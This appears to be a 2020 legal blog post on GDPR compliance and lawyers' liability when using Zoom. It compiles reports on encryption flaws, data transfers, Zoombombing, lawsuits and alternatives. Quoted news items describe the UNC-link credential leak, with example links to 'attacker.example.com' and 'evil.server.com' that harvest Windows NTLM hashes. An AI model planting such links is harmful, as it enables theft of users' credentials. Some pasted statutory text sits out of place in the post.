ZOOM VIDEOCONFERENCING PRIVACY AND LIABILITY

19TH APRIL 2020 TARA

A Look At The Many Considerations to Keep in Mind Before Using A Video Conferencing Technology .

A deep look at the main legal consequences linked to the use of the free video conferencing application Zoom, which has become very popular, with an increase of 20 to 200 million users in a space of a few days, propelled by the needs of confinement and remote working imposed by the Covid-19 pandemic.

First, schematically, four categories of data are concerned with more or less self data sharing:

• the organisers’ data, 
• the Guest data,
• Data from third parties mentioned during the videoconference,
• Data concerning minors.

Among these, two categories of data:

• Personal data with a relatively broad definition of Article 4
• The so-called special category data or sensitive data, which in principle should not be processed unless exception. The processing of this data is strictly framed as subject to specific protection as defined in Article 9

Biometric data and other special data processed during the use of video conferences.

The data processed by a video recording can be considered as ‘biometric’ data when the images can be used to identify individuals.

According to a ruling by the European Court of Justice, C-101/01 (November 6, 2003):

• Personal data

“The operation of referring, on a web page, to various people and identifying them either by name or by other means, for example their telephone number or information relating to their working conditions and their hobbies, constitutes “processing of personal data, fully or partially automated” within the meaning of Article 3 (1) of Directive 95/46 / EC of the European Parliament and of the Council, 24 October 1995, relating to the protection of individuals with regard to the processing of personal data and to the free movement of such data. ”

• Personal data of special or sensitive categories.

‘The indication that a person has injured his foot and is on partial sick leave constitutes personal data relating to health within the meaning of Article 8 (1) of Directive 95/46 . “

This judgment was given in application of the Directive, prior to the entry into force of the GDPR but remains applicable. Previously, in particular, health data, listed as ‘sensitive‘ data, are now data of special category aArticle 9 .

This point was recalled by a recent decision of the French Administrative Court The Conseil d’Etat dated February 27, 2020 concerning facial recognition in schools.

According to the CE: (51) Personal data which, by its nature, are particularly sensitive from the point of view of fundamental freedoms and rights deserve specific protection, since the context in which they are processed could pose significant risks for these freedoms and rights. This personal data should include personal data which reveals racial or ethnic origin, it being understood that the use of the expression “racial origin” in this Regulation does not imply that the Union adheres to theories tending to establish the existence of distinct human races. The processing of photographs should not systematically be regarded as constituting the processing of particular categories of personal data, since thesefall under the definition of biometric data only when they are processed using a specific technical method allowing the unique identification or authentication of a natural person. Such personal data should not be processed, unless this is authorized in specific cases provided for in this Regulation, taking into account that the law of a Member State may lay down specific data protection provisions aimed at adapting the application of the rules of this Regulation with a view to complying with a legal obligation or for the performance of a task of public interest or relating to the exercise of the public authority vested in the controller. In addition to the specific requirements applicable to this processing, the general principles and other rules of this Regulation should apply, in particular as regards the conditions for the lawfulness of the processing.Derogations from the general prohibition to process these particular categories of personal data should be explicitly provided for, inter alia when the data subject gives hisexpress consent or to meet specific needs, in particular when the processing is carried out within the framework of the legitimate activities of certain associations or foundations whose purpose is to allow the exercise of fundamental freedoms.

In UK : Murray v Big Picture §80

It is therefore possible to consider that the images processed during a videoconference fall within the definition of biometric data. The possibility of possible facial recognition training is not included. In addition, users who do not reveal their identity using nicknames can be identified by the disclosure of their associated image.

Consequently, the images or videos identifying the participants according to their racial, ethnic, religious, philosophical, or union membership are to be considered as falling under the category of special data. Similarly, those relating to the state of health or data of minor children fall into the category of special data.

Cf. the the CNIL‘s recommendation in matters of facial recognition and the recent judgment of the Conseil d’Etat of February 27, 2020 .

The principles of legality Article 5

The data to be collected must be processed lawfully and fairly according to the Article 5.

1. Personal data must be:

a) processed lawfully, fairly and in a transparent manner in relation to the data subject (‘lawfulness, fairness and transparency’);(

A privacy notice must be produced defining the legal basis for processing and offering the transparency obligations defined in article 13, as explained infra.

b) collected for specified, explicit and legitimate purposes and not further processed in a manner that is incompatible with those purposes; further processing for archiving purposes in the public interest, scientific or historical research purposes or statistical purposes shall, in accordance with Article 89(1), not be considered to be incompatible with the initial purposes (‘purpose limitation’);

Any recording of the video conference and its subsequent uses must be notified to the participants and their legal bases justified.

c) adequate, relevant and limited to what is necessary in relation to the purposes for which they are processed (‘data minimisation’);

The data collected must be reduced to the strict minimum.

d) accurate and, if necessary, kept up to date; all reasonable measures must be taken to ensure that personal data which are inaccurate, with regard to the purposes for which they are processed, are deleted or rectified without delay (accuracy);

Saved data will be subject to the obligation of accuracy.

e) kept in a form which permits identification of data subjects for no longer than is necessary for the purposes for which the personal data are processed; personal data may be stored for longer periods insofar as the personal data will be processed solely for archiving purposes in the public interest, scientific or historical research purposes or statistical purposes in accordance with Article 89(1) subject to implementation of the appropriate technical and organisational measures required by this Regulation in order to safeguard the rights and freedoms of the data subject (‘storage limitation’);

The shelf life must be defined and communicated to the parties. The registrations, if they exist, cannot exceed the fixed deadline. Archives must develop limited and secure access when they are no longer justified.

f) processed in a manner that ensures appropriate security of the personal data, including protection against unauthorised or unlawful processing and against accidental loss, destruction or damage, using appropriate technical or organisational measures (‘integrity and confidentiality’).

The security of video conferences and their subsequent recordings or access is the liability of the organisers, who must ensure that the service provider fulfil their mission in accordance with the obligations of the GDPR. This includes transmission by encryption excluding transfers to third countries that do not represent adequate protection.

2. The controller is responsible for the compliance with paragraph 1 and is able to demonstrate that it is respected (responsibility).

This point is very important because as explained below, the responsibility of the videoconference organiser can be engaged for non-compliance with the regulations or allowing unauthorised access to personal data, capable of causing harm, ‘distress’ or loss of control.

Determining the purpose of the processing

Any data processing must meet a legitimate purpose as listed in Article 6 In the context of videoconferencing, processing may be either considered to be of legitimate interest – with the need to carry out the three part necessity and proportionality test – or a request for prior consent will apply. The processing must be recorded by the controller if necessary in his / her Article 30 record of processing and specified in the privacy notice. It should be remembered that in the case of consent, it can be withdrawn at any time with the risk of invalidating the lawfulness of any recording subject to erasure.

• On consent

The paragraph 11) Art. 4  defines consent as ‘any freely given, specific, informed and unambiguous indication of the data subject’s wishes by which he or she, by a statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her ‘.

In addition, Article 7 , relating to the conditions applicable to consent, provides:

“ 1. In cases where the processing is based on consent, the controller is able to demonstrate that the data subject has given his consent to the processing of personal data concerning him.  

1. Where processing is based on consent, the controller shall be able to demonstrate that the data subject has consented to processing of his or her personal data.

2. If the data subject’s consent is given in the context of a written declaration which also concerns other matters, the request for consent shall be presented in a manner which is clearly distinguishable from the other matters, in an intelligible and easily accessible form, using clear and plain language. Any part of such a declaration which constitutes an infringement of this Regulation shall not be binding.

An explicit and informed consent is required from participants in the video conference when the data is collected from the recording or any subsequent total or partial broadcasts, including screenshots of the meetings. Remembering that, as biometric data capable of identifying individuals, are data of special category art. 9-2 a) – this concerns participants’ data and any other personal data processed during the video conference  Article 9 – consents must be record of processing activities in accordance with Article 30. The purpose of processing the data of persons not present must be clearly justified.

 Article 42GDPR states : ‘Where processing is based on the data subject’s consent, the controller should be able to demonstrate that the data subject has given consent to the processing operation. In particular in the context of a written declaration on another matter, safeguards should ensure that the data subject is aware of the fact that and the extent to which consent is given. In accordance with Council Directive 93/13/EEC a declaration of consent pre-formulated by the controller should be provided in an intelligible and easily accessible form, using clear and plain language and it should not contain unfair terms. ⁴For consent to be informed, the data subject should be aware at least of the identity of the controller and the purposes of the processing for which the personal data are intended. ⁵Consent should not be regarded as freely given if the data subject has no genuine or free choice or is unable to refuse or withdraw consent without detriment.‘

Some participants may have wished to use nicknames for personal reason and may not wish to be exposed to the general public. An alternative must be offered to them.

Obligation of transparency – Articles 13

As mentioned above, the organiser of the videoconference or the ‘host’ must communicate the means and legal basis for data processing in all transparency, before collecting any data :

In fact, it seems that many video conferencing applications are sorely lacking transparency. The host has multiple technical capacities and prerogatives which are too often unknown to other participants such as recording and their subsequent broadcasts. The Article 13 requires the following information to data subjects :

• the identity and contact details of the controller and, where applicable, the representative of the controller;
• the contact details of the data protection officer, where applicable;
• the purposes of the processing for which the personal data is intended as well as the legal basis for the processing;
• where the processing is based on point (f) of art 6(1), the legitimate interests pursued by the controller or by a third party;
  
• the recipients or categories of recipients of the personal data, if any;
• where applicable, the fact that the controller intends to transfer personal data to a third country or international organisation and the existence or absence of an adequacy decision by the Commission, or in the case of transfers referred to in Articles 46 or 47, or the second subparagraph of Article 49(1), reference to the appropriate or suitable safeguards and the means by which to obtain a copy of them or where they have been made available.
  
  
• The rights of participants under Article 14 , Article 15  and in particular their right to rectify or withdraw consent, their right to complain to the administrative authority must be reminded.

In addition to the information referred to in paragraph 1, the controller shall provide participants with the following additional information when obtaining personal data, to ensure fair and transparent processing:

• the period during which the personal data will be stored or, if this is not possible, the criteria used to determine this period;
  • the existence of the right to request the controller to access and rectify or erase personal data or limit the processing of the data subject or to object to the processing, as well as the right to data portability;
  • when the processing is based on Article 6

(b)	processing is necessary for the performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract;

[Recitals(s) :44]

(c)	processing is necessary for compliance with a legal obligation to which the controller is subject;

[Recitals(s) : 45]

(d)	processing is necessary in order to protect the vital interests of the data subject or of another natural person;

[Recitals(s) :46]

(e)	processing is necessary for the performance of a task carried out in the public interest or in the exercise of official authority vested in the controller;

(f)

processing is necessary for the purposes of the legitimate interests pursued by the controller or by a third party, except where such interests are overridden by the interests or fundamental rights and freedoms of the data subject which require protection of personal data, in particular where the data subject is a child.

[Recitals(s) :47, 48, 49]Point (f) of the first subparagraph shall not apply to processing carried out by public authorities in the performance of their tasks.[Recitals(s) : 40, 50]2.   Member States may maintain or introduce more specific provisions to adapt the application of the rules of this Regulation with regard to processing for compliance with points (c) and (e) of paragraph 1 by determining more precisely specific requirements for the processing and other measures to ensure lawful and fair processing including for other specific processing situations as provided for in Chapter IX.
3.   The basis for the processing referred to in point (c) and (e) of paragraph 1 shall be laid down by:

(a)	Union law; or

(b)	Member State law to which the controller is subject.

The purpose of the processing shall be determined in that legal basis or, as regards the processing referred to in point (e) of paragraph 1, shall be necessary for the performance of a task carried out in the public interest or in the exercise of official authority vested in the controller. That legal basis may contain specific provisions to adapt the application of rules of this Regulation, inter alia: the general conditions governing the lawfulness of processing by the controller; the types of data which are subject to the processing; the data subjects concerned; the entities to, and the purposes for which, the personal data may be disclosed; the purpose limitation; storage periods; and processing operations and processing procedures, including measures to ensure lawful and fair processing such as those for other specific processing situations as provided for in Chapter IX. The Union or the Member State law shall meet an objective of public interest and be proportionate to the legitimate aim pursued.[Recitals(s) : 41]4.   Where the processing for a purpose other than that for which the personal data have been collected is not based on the data subject’s consent or on a Union or Member State law which constitutes a necessary and proportionate measure in a democratic society to safeguard the objectives referred to in Article 23(1), the controller shall, in order to ascertain whether processing for another purpose is compatible with the purpose for which the personal data are initially collected, take into account, inter alia:

(a)	any link between the purposes for which the personal data have been collected and the purposes of the intended further processing;

(b)	the context in which the personal data have been collected, in particular regarding the relationship between data subjects and the controller;

(c)	the nature of the personal data, in particular whether special categories of personal data are processed, pursuant to Article 9, or whether personal data related to criminal convictions and offences are processed, pursuant to Article 10;

(d)	the possible consequences of the intended further processing for data subjects;

(e)	the existence of appropriate safeguards, which may include encryption or pseudonymisation.

•  paragraph 1, point a), or on  Article 9 paragraph 2, point a), the existence of the right to withdraw consent at any time, without affecting the lawfulness of processing based on consent before its withdrawal;
  • the right to lodge a complaint with a supervisory authority;
  • if the provision of personal data is a legal or contractual requirement, or a requirement necessary for concluding a contract, as well as if the data subject is required to provide the personal data and the possible consequences of the non-provision of these data;
  • the existence of automated decision-making, including profiling, referred to in Article22 paragraphs 1 and 4, and, at least in these cases, significant information on the logic involved, as well as the meaning and the intended consequences of such processing of the data subject.

When the controller intends to continue processing personal data for a purpose other than that for which this data was collected, the controller shall provide the data subject, before any further processing, with information on this other purpose and any other relevant information referred to in paragraph 2.

Paragraphs 1, 2 and 3 do not apply when and to the extent that the data subject already has information.

A privacy notice must be provided at the time of data collection, that is to say before guests join the meeting.

Data retention periods should be notified.

The purpose limitation requirement means that it must be clear from the privacy notice who accesses the data and for what specific purpose. Sharing data with Facebook was contrary to the GDPR. Even if the developer Zoom has changed this, users still need to update their application.

These data must not be used for purposes other than those intended, such as training facial recognition without the consent of the parties concerned. The host is responsible for respecting these principles and in particular for further processing by Zoom.

Zoom’s privacy policy has raised justified fears:

• Zoom’s privacy policy  claims the right to collect and store personal data and share it with third parties such as advertisers.

Until it was modified during the weekend, pre-dated to March 18 

• The company  updated its privacy policy  on Sunday after users reported concerns, and  on Monday , Eric S. Yuan, chief executive and founder of Zoom, posted a link on Twitter to a company blog item about the policy. NYTimes
• In a statement for this article, the company said it took “its users’ privacy, security and trust extremely seriously,” and had been “working around the clock to ensure that hospitals, universities, schools and other businesses across the world can stay connected and operational. ”
• “We appreciate the New York attorney general’s engagement on these issues and are happy to provide her with the requested information,” the statement added.
• Zoom privacy notice grants access to data even though for people who have not a Zoom account
• Zoom’s privacy policy gives the company rights to collect personal data of people regardless of whether they have a Zoom account. This data they might collect on non-Zoom customers might include their physical address, debit card information and even what device they are using.
• They keep the right to collect and share information with unspecified third parties in present and in the future.

Privacy by design or Privacy Enhanced Technology (PET)

Zoom has few protective safeguards, but they are disabled by default. No processing must be carried out without transparency or consent expressed by positive act of the subjects concerned. In this case it is not very clear when a recording is made or enable subsequent uses.

The application included an attention tracking option which enabled the host to draw the attention of participants if they visited other sites or switched to other windows. This overly intrusive option has been disabled.

Again, a privacy notice should clarify the consent required from participants. It is not activated by default, knowing that biometric, health or data belonging to minors are special categories requiring express consent.

• A small red button when recording – can be easily missed. There is an option of request recording consent at the beginning – what about the ones joining in in the course of the meeting? The consent request is OFF by default. Privacy by design : should be ON by default

Security obligation

Limit access to data to secure content and paramount.

Absence of end to end encryption 

The encryption of communications or encryption was part of Zoom’s promises but was found to be encryption of the TLS browser type and not UDP as revealed by the Intercept . Zoom apologized and acknowledged the failure. However, end-to-end encryption is mandatory to ensure data protection, especially as it can be of a special category.

However, it turns out that the data would be stored on Amazon S3 in clear text and would not even be encrypted. Consequently, any Zoom employee or developer having access to S3 compartments for development and maintenance activities could intercept them and take them over for such possible processing. There is therefore no real confidentiality on these recordings. This problem is far from negligible.

The only barrier between private and public registration is the security of the Zoom firewall and the other things they have in place. Once these have been breached, for example by a phishing attack, the S3 buckets are a fair game. A decent encryption system on the stored records would have been essential here.

• a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection. ”
• On 4/3, Citizen Lab  reported
• Zoom  documentation  claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the complaintxt are preserved during encryption.
• The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China. Reported by the Security expert Schneier in his blog
• Does Zoom uses end to end encryption?
• Warning: Zoom Makes Encryption Keys In China (Sometimes)
• Where is the EU DPA investigation? Once again, Eu personal data is in between China interception and the US Cloud Act interception. Data sent outside the EU in China without users knowledge. “As Citizen Lab hadn’t sent its findings to Zoom, saying it was in the public interest to release the information as soon as possible, the videoconferencing company wouldn’t have been aware of the findings. But Yuan assured that if user data was being transferred to China when users weren’t even based there, “we are willing to address that.”

We’ve even learnt that Zoom would transfer data for encryption in China, which the CEO did not fail to recognise.

• Zoom’s Encryption Is “Not Suited For Secrets” And Has Surprising Links To China, Researchers Discover

The outrages go further, April 1 news has fallen, Zoom would take over the passwords saved by Windows:

• On 4/1, we learned that Zoom for Windows can be used to  steal  users’ Window credentials.
• Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called  universal naming convention  strings – such as \\ attacker.example.com/C$ – into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding  NTLM  hashes to the address contained in the link .

On April 2 we learned that Zoom would access personal data extracted from users’ Linkedin profiles:

• On 4/2, we learned that Zoom  secretly displayed  data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)
• Every Zoom Security and Privacy Flaw So Far, and What You Can Do to Protect Yourself

Very quickly came the news of intruders inviting themselves in the middle of meetings, intrusion qualified as ‘ZoomBombing’:

• Naked man crashing school’s video call is a privacy lesson for all
• Online Zoom classes were disrupted by individuals spewing racist, misogynistic or vulgar content. Experts say professors using Zoom should familiarize themselves with the program’s settings.
• Suddenly, dozens of attendees were bombarded with disturbing imagery. A troll entered the call and screenshared Two Girls, One Cup and other horrifying sexual videos. Attempts to block the attack were thwarted as the perpetrator simply re-entered the call
• U.S. Senate tells members to avoid Zoom over data security concerns: FT
• An Open Rights Group Zoom meeting was disturbed by child pedo pornographic images.

Another problem possibly solved by Zoom, data sharing with Facebook using the SDK denounced by Motherboard :

• Last week, after an  article on the news site Motherboard  reported that software inside the Zoom iPhone app was sending user data to Facebook, the company said it was  removing the tracking software .
• Zoom, like other apps, uses Facebook ‘ s software development kits (SDK) to implement features quickly. In exchange, Facebook gains useful information about users. As Vice’s Motherboard explains, Zoom connects to Facebook’s Graph API, which is the way developers get data in or out of Facebook.
• The Zoom app notifies Facebook when the user opens the app, details on the user’s device such as the model, the time zone and city they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user’s device which companies can use to target a user with advertisements.

Zoom has modified this flaw, inviting users to update their Application:

• Zoom Removes Its Facebook Data Sharing on iOS amid Possible GDPR Violations
• Zoom has removed its Facebook SDK for iOS integration after a report  from Motherboard .
• the developers  in a statement . “Users will need to update to the latest version of our application that’s already available at 2:30 pm Pacific time on Friday, March 27, 2020, in order for these changes to take hold, and we strongly encourage them to do so. “

The Electronic Frountier Foundation alerts that users still don’t know how to erase the information collected

• Zoom has not offered guidance on how users can delete any information that was gathered about their device. This removal also doesn’t address any of the app’s other potential privacy issues. The EFF points out  that Zoom administrators can get detailed information about how, when, and where users are using the app, with real-time dashboards. As it’s an intentional feature, it’s unlikely the companywill address this.

We read in Forbes magazine :

• ‘ Ultimately, anyone having sensitive conversations should therefore consider whether Zoom is suitable, he noted. “I would think very carefully before I used Zoom to communicate classified information, trade secrets or confidential medical data,” Marczak said. “If you are a human rights defender, lawyer, journalist, or anyone else working on sensitive topics that you think a nation-state or other powerful adversary might be interested in, I would advise you to wait for Zoom to make security improvements in their app before you use it. ”

Apple has introduced an update to remove the ‘ hidden Zoom web server’  :

• Thousands of Zoom video calls left exposed on open Web
• Apple has pushed a silent Mac update to remove hidden Zoom web server
• It appears you can  snaffle  people’s Windows local login usernames and hashed passwords via Zoom by getting them to click on a URL in a chat message that connects to a malicious SMB file server. A link such as  \\evil.server.com\foorbar.jpg will, when clicked on, cause Windows to connect to  evil.server.com, supplying the logged-in user’s credentials in hope of fetching  foobar.jpg.
• Ex-NSA hacker drops new zero-day doom for Zoom. Hot on the heels of two security researchers  finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.
• Patrick Wardle, a former NSA hacker and now principle security researcher at Jamf, dropped the two previously undisclosed flaws  on his blog  Wednesday, which he shared with TechCrunch .

Obviously with the galloping success of Zoom, we see a rookie of ‘ fake Zooms’

• Researchers see sharp rise in fake Zoom domains as hackers target remote workers https://siliconangle.com/2020/03/30/researchers-see-sharp-rise-fake-zoom-domains-hackers-target-remote-workers/

Transfer of personal data outside the EU / EEA

Zoom is a California-based company. As such, he is self certified Privacy Shield.

However, Intercept has revealed the transfer of data to China. The CEO acknowledged this fact attributing it to a simple referral error.

No one can ignore the war of industrial espionage. Zoom, like any American company is subject to the US Cloud Act. In other words at any time the data can be claimed by the US government.

• As Usage Booms Amid Coronavirus Crisis, Zoom’s R&D Presence In China Under Scrutiny

Data breach or unauthorised access to data

Any unauthorised access to personal data must be assessed as to the seriousness of the potential consequences for the individuals concerned. In the event of a serious risk, they must be notified as soon as possible and no later than within 72 hours . The data protection authority must be notified within 72 hours at the latest. In all cases the data breach must be listed in the internal register in accordance with the provisions of  Article 33 .

• Posting screen shots of videoconference revealing the ID number of the meeting and the images of the participants accompanied by their names or pseudonyms can be considered as a breach of confidentiality,
• 2 major recent examples : Boris Johnson CNB posting a board meeting or their GA.

The specific case of the use of such a tool by lawyers or professional associations

In a context where so many cries of alarms were launched about the failures of this tool, as the New York Attorney General investigations asking the schools not to use the application, followed by other state authorities.

• NY Attorney General to look at Zoom  :
• Multiple state AGs looking into Zoom’s privacy practices

Use of video conferences for hearing outfits:

Richard Susskind, President of the Society for Computers and Law announced two weeks ago :

Launched today: REMOTE COURTS WORLDWIDE, designed to help the global community of justice workers share experiences of ‘remote’ alternatives (audio, video, online) to traditional courts. This is a joint effort involving SCL – Society for Computers and Law , HM Courts & Tribunals Service (HMCTS) , and the UK’s LawTech Delivery Panel. We must sixteen the moment and come together to accelerate the development of new ways of continuing to deliver just outcomes for court users. Please contribute content at…

He later posted : Update after 1 week. We now have news from 20 countries on REMOTE COURTS WORLDWIDE, a site that helps the global community of justice workers share experiences of ‘remote’ alternatives (audio, video, online) to traditional courts –

The courts will resume face-to-face hearings when the current crisis is over. But remote working can be a much more efficient way of delivering justice. My latest column for @lawsocgazette looks at how courts and tribunals are coping with online hearings.

In France, on April 3, Maitre Aymeric Duhesne from Cabinet Montesquieu announced on Linkedin: 

“With Le Bâtonnier Stephane Dhonte, the registry of the Lille Métropole Commercial Court and the judge for interim measures, we have just finalized the test of the 1st hearing by videoconference as allowed by order 2020-304 of 25.03.20. The Bar of Lille and its lawyers are force of proposal and immediately operational solution and thus mark their determination to allow the continuity of the access to the right to litigants, individuals and companies, in spite of the health crisis. Cases will be heard again next week and decisions made. ”

At the same time, Stephen Almaseanu, Vice Prosecutor at the Paris Public Prosecutor’s Office, Section F2 (deputy head of the section, in charge of commercial affairs) announced on Linkedin:

“ The Commercial Court of Paris has just held, on Wednesday 1 and Thursday 2 April 2020, two days of dematerialized hearings which went very well. More than 40 urgent files, notably due to the presence of unpaid employees, were processed by videoconference using TIXEO , French software ensuring total confidentiality of debates thanks to fully encrypted links, which allows it to be certified by the ‘ ANSSI – National Agency for Information Systems Security. These concerned the opening of liquidations and conversions into liquidation, but also the opening of receiverships (remember, moreover, that since the beginning of the confinement, many ad hoc mandates and conciliations have also been opened). Congratulations in particular to the Registry of the Tribunal, which organized these very cumbersome hearings to set up by warning all stakeholders (managers, counsel, AJMJ, employee representatives) of the exact time of the passage of their file so that everyone can connect at the right time). Congratulations also to the judges and to all the interveners who made it possible to hold these very useful first hearings, which allow Parisian businesses to continue to have access to the court in the event of an emergency. ”

Maître Emmanuel Brunau du Mans announced yesterday still on Linkedin:

“ For information, the Le Mans commercial court registry operates normally despite the closure of the Judicial precinct. A hotline is maintained at the usual hours. Finally, to deal with the emergency, hearings to initiate collective proceedings in secure TIXEO videoconferencing are held every Tuesday during confinement. ”

Where initiatives fall by the wayside in France, on the Anglo-Saxon side a concerted initiative has emerged:

Despite the popularity of this video conferencing tool, alarm cries continue to be heard against the use of Zoom.

EPIC, Electronic Privacy Information Center , requests investigations from the FTC

• “ Jonathan Leitschuh , exposed a flaw allowing hackers to  take over Zoom webcams . The letter noted that the company did not address problem until after the Electronic Privacy Information Center, a public interest research center,  filed a complaint  about Zoom with the Federal Trade Commission last year . ”
• “ According to EPIC,  Zoom  intentionally designed its web conferencing service to bypass browser security settings and remotely enable a user’s web camera without the knowledge or consent of the user. As a result, Zoom exposed users to the risk of remote surveillance, unwanted videocalls, and denial-of-service attacks, ” the complaint alleged. ”
• “EPIC Urges FTC to Investigate Zoom, Issue Best Practices for Online Conferencing In a letter to FTC Chairman Joe Simons, EPIC urged the FTC to“ open an investigation of Zoom’s business practices and to issue, as soon as practicable, Best Practices for Online Conferencing Services.” Here’s the press release “

FBI issues alerts

• “Earlier this week, the FBI  warned  of so-called“ Zoom-bombing ”or videoconference hacking. “The FBI has received multiple reports of conferences being disrupted by pornographic and / or hate images and threatening language,” it said. Published by CNN

–        Zoom needs to clean up its privacy policy

“Privacy advocacy group Access Now, meanwhile, dug into Zoom’s privacy policy and practices and didn’t like what it saw,  sending a letter  to the company on March 19 asking it to publish a transparency report along the same lines as other companies that made it plain exactly what the company was doing with its users’ data. “ Harvard Blog

• “Attorney General Tong Issues Recommendations for Safe Video Conferencing. “Earlier this week, I attended a Zoom conference that was ‘bombed’ by hundreds of profane and racist comments. Needless to say, I am familiarizing myself with these platforms’ privacy and security features, too. My office has been in contact with representatives from Zoom to address this and other issues relating to online security and privacy, ”said Attorney General Tong. “In the meantime, Attorney General Tong encouraged everyone to practice safer video conferencing by: • Ensuring that your video conference software is up to date. • Confirming that your conferences are private, either by requiring a password for entry or controlling guest access through a virtual waiting room. • Checking that the highest security settings are applied for your teleconference platform.• Consult your software company’s security information or your IT department.Here’s the press release ”

What may be the responsibility of lawyers with regard to the processing of data following the use of an application that has raised so many questions 

A lawyer is bound by professional confidentiality in the UK :

The principle regulatory duties relating to confidentiality are to be found in the SRA Principles 2011 and at Chapter 4 of the SRA Code of Conduct 2011 (“the Code”). The relevant Principles are:1 – uphold the rule of law and the proper administration of justice;4 – act in the best interests of each client;5 – provide a proper standard of service to your clients; and6 – behave in a way that maintains the trust the public places in you and in the provision of legal services.whilst Outcome O (4.1) contains the main regulatory duty, namely that “you keep the affairs of clients confidential unless disclosure is required or permitted by law or the client consents;”
There is also a duty to ensure “that the affairs of clients should be kept confidential” which is to be found at section 1(3)(e) of the Legal Services Act 2007.

Need for an impact study to be carried out before the adoption of the new technology,

In order to ensure proper compliance with the data protection rules as developed above, lawyers in the footsteps of their professional orders, must ensure the compliance of the technical means used. The confidentiality of the information they are responsible for requires their utmost vigilance.

In this context, an evaluation of the impact of the new technology on the protection of the data processed is essential before any use.

The UK ICO explains:

The DPIA is an important tool for the accountability of organisations: it helps them not only to build data processing respectful of privacy, but also to demonstrate their compliance with the General Data Protection Regulations (GDPR). It is compulsory for treatments likely to generate high risks.

• You must do a DPIA for processing that is likely to result in a high risk to individuals. This includes some specified types of processing. You can use our screening checklists to help you decide when to do a DPIA.
• It is also good practice to do a DPIA for any other major project which requires the processing of personal data.
• Your DPIA must:
  • describe the nature, scope, context and purposes of the processing;
  • assess necessity, proportionality and compliance measures;
  • identify and assess risks to individuals; and
  • identify any additional measures to mitigate those risks.
• To assess the level of risk, you must consider both the likelihood and the severity of any impact on individuals. High risk could result from either a high probability of some harm, or a lower possibility of serious harm.
• You should consult your data protection officer (if you have one) and, where appropriate, individuals and relevant experts. Any processors may also need to assist you.
  If you identify a high risk that you cannot mitigate, you must consult the ICO before starting the processing.
  If you are processing for law-enforcement purposes, you should read this alongside the Guide to Law Enforcement Processing.
  The ICO will give written advice within eight weeks, or 14 weeks in complex cases. If appropriate, we may issue a formal warning not to process the data, or ban the processing altogether.’

In the absence of risk assessment measures, the negligent lawyer undertakes to challenge his responsibility. Professional orders should be made aware of this risk and support their members in finding a solution that meets the requirements of the regulations.

The CNIL, like other national protection authorities, has produced guides to this effect. Here is the document produced by the Irish Data Protection Commissioner . A recommendation from ANSSI is also available. ENISA ‘ cybersecurity when working from home’ .

The use of the Zoom application has already been subject to liability lawsuits:

• Zoom Sued Over Privacy, Announces Cybersecurity Upgrades
• The Facebook API kerfuffle resulted in a  lawsuit  [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, The Register.
• Controller responsibility regarding use of ZOOM :Use of ZOOM requires an organisation to enter into a processing agreement with ZOOM. For this, a standard agreement has been drawn up by ZOOM whereby many of the responsibilities for processing personal data are placed with the controller. See the addendum for this

• Brittany Roush, Director at the Crypsis Group, said : “That having that kind of flexibility to ensure that critical services can carry on, especially in a crisis, does not take the teeth from the CCPA and GDPR. If anything, it demonstrates that the regulatory bodies are carrying out their essential function – which is to ensure that companies protect consumer data… In many ways, the CCPA and GDPR should take a page from HIPAA, which lowered security standards for telehealth in order to manage the critical healthcare demands of the pandemic… we do not have the luxury of time on our side to motto perfect solutions.
• Zoom Credentials Database Available on Dark Web
• Germany bans Zoom for official use
• Lessons from the Past: What Zoom can learn from Microsoft
• Elon Musk’s SpaceX bans Zoom over privacy concerns – memo
• The Interdepartmental Digital Directorate “strongly advises” against the Zoom application
• Singapore stops teachers using Zoom app after ‘very serious incidents’
• Increasingly discouraged, Zoom calls on the former chief security officer of Facebook 
• Why Most Should Avoid An ‘Out Of Control’ Zoom Right Now
• Thousands of Zoom video calls left exposed on open Web
• Dark web: Cybercriminals sell over 500,000 Zoom accounts
• Facebook, LinkedIn Sued For ‘Eavesdropping’ On Zoom Users.
• A class-action lawsuit has been brought against Facebook, LinkedIn and Zoom alleging personal information from Zoom user accounts was shared to the social networking sites.
• A Feature on Zoom Secretly Displayed Data From People’s LinkedIn Profiles
• Zoom Credentials Database Available on Dark Web

Zoom is surely not the only company disrespectful of users security and privacy. Hopefully Data Protection Authorities will further investigate.

• Irish data protection commissioner liaises with European colleagues over Zoom concerns

• Meanwhile, concerns are not where you would expect them to be : Lawyers are dressing way too casual during Zoom court hearings, judge says

So in conclusion, it is imperative to properly assess the impact of the choice of a technology on data protection. A lawyer or whoever handles sensitive data entrusted to him or in the course of his mission, is required to apply the greatest vigilance. Impact assessment is essential. In its absence, the questioning of responsibility is to be feared.

What are the alternative solutions?

Zoom alternatives:

Jitsi                                                       Tixeo recommended by ANSSI

BigBlueButton                                     Video lawyers

BlueJeans                                            Skype

GotoMeeting                                       Teams

Webex

Your NOYB comparison chart   – For the version with active links,  

Other comparative table produced by the Dutch Data Protection Authority translated by Christopher SCHMIDT Data Privacy Specialist • Magister of Law CIPP⁄E CIPM CIPT CBSA

• CONTINUE TO FOLLOW THIS TRAD IN PEARLTREES ACCOUNT ON WHICH THE LATEST NEWS AND ARTICLE ON THIS SUBJECT ARE GROUPED.

If you still wanted to continue using this application, here are some tips on how to use Zoom more safely:

–        How to keep your Virtual (Zoom) Meetings safe :

